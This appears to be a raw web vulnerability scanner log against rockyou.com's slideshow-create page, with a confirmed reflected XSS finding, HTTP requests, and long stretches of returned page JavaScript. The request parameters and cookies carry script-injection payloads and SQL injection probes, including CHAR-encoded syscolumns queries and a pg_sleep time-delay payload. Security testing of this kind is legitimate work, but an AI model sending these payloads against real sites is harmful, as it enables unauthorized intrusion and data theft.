currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang=en&source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025EC)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploa..
Date: Mon, 18 Apr 2011 22:54:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:54:02 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:54:03 GMT; path=/; domain=.rockyou.com,lastlogin=1303167243; expires=Wed, 27-Jul-2011 22:54:03 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:54:03 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:54:03 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:54:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23750 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26945
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x0025EC)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang=en&source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025EC)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploa..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| source | GET | br |
| create | GET | 1 |
| instanceid | GET | '"--></style></script><script>alert(0x0025F3)</script> |
Request
GET /slideshow-create.php?source=br&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025F3)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167503; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167503; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:58:24 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:58:23 GMT; path=/; domain=.rockyou.com,lastlogin=1303167504; expires=Wed, 27-Jul-2011 22:58:24 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:58:24 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=24143 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26966
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = ''"--></style></script><script>netsparker(0x0025F3)</script>';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is 